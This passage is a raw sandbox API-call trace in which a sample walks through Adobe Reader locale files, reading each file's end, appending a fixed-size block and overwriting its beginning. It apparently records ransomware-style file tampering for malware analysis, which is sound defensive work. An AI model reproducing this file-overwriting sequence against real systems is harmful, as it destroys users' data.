lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b6b [0079.183] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b6b [0079.210] WriteFile (in: hFile=0x1dc, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.210] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.210] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.211] CloseHandle (hObject=0x1dc) returned 1 [0079.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Annots.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\annots.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.212] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.212] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7b000 [0079.212] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.212] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.212] ReleaseMutex (hMutex=0x168) returned 1 [0079.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.NLD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.NLD", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.NLD", lpUsedDefaultChar=0x0) returned 10 [0079.212] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0079.237] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7a000 [0079.237] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.259] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7a000 [0079.259] WriteFile (in: hFile=0x1dc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.260] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.260] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.260] CloseHandle (hObject=0x1dc) returned 1 [0079.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\makeaccessible.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\makeaccessible.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.261] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.261] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x13600 [0079.262] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.262] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.262] ReleaseMutex (hMutex=0x168) returned 1 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.NLD", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.NLD", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.NLD", lpUsedDefaultChar=0x0) returned 18 [0079.262] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.269] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12600 [0079.269] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.279] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12600 [0079.279] WriteFile (in: hFile=0x1dc, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.280] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.280] CloseHandle (hObject=0x1dc) returned 1 [0079.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\search.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6000 [0079.287] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.287] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.287] ReleaseMutex (hMutex=0x168) returned 1 [0079.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.NLD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.NLD", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.NLD", lpUsedDefaultChar=0x0) returned 10 [0079.287] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.295] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5000 [0079.296] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.322] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5000 [0079.323] WriteFile (in: hFile=0x1dc, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.323] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.324] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.324] CloseHandle (hObject=0x1dc) returned 1 [0079.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Acroform.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\acroform.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.325] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.359] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x68200 [0079.359] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.359] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.359] ReleaseMutex (hMutex=0x168) returned 1 [0079.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.POL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.POL", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.POL", lpUsedDefaultChar=0x0) returned 12 [0079.359] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891de8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2891de8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0079.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x67200 [0079.553] ReadFile (in: hFile=0x1dc, lpBuffer=0x2669698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x67200 [0079.858] WriteFile (in: hFile=0x1dc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.858] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.858] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.858] CloseHandle (hObject=0x1dc) returned 1 [0079.859] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\EScript.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\escript.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.859] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.860] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa000 [0079.860] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.860] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.860] ReleaseMutex (hMutex=0x168) returned 1 [0079.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.POL", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.POL", lpUsedDefaultChar=0x0) returned 11 [0079.860] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.007] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9000 [0081.007] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.009] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9000 [0081.018] WriteFile (in: hFile=0x1dc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.022] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0081.022] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.022] CloseHandle (hObject=0x1dc) returned 1 [0081.023] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\reflow.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\reflow.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0081.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1200 [0081.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.024] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.024] ReleaseMutex (hMutex=0x168) returned 1 [0081.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.POL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.POL", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.POL", lpUsedDefaultChar=0x0) returned 10 [0081.028] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0081.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0081.101] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0081.101] CloseHandle (hObject=0x1dc) returned 1 [0081.101] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\WebLink.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\weblink.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0081.102] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.102] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7200 [0081.102] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.102] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.103] ReleaseMutex (hMutex=0x168) returned 1 [0081.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.POL", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.POL", lpUsedDefaultChar=0x0) returned 11 [0081.103] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6200 [0081.110] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6200 [0081.123] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0081.123] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] CloseHandle (hObject=0x1dc) returned 1 [0081.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\DVA.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\dva.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0081.124] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.125] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4a00 [0081.125] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.125] ReleaseMutex (hMutex=0x168) returned 1 [0081.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.PTB", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.PTB", cchWideChar=7, lpMultiByteStr=0x1f7ab7c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.PTB", lpUsedDefaultChar=0x0) returned 7 [0081.125] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867a58, 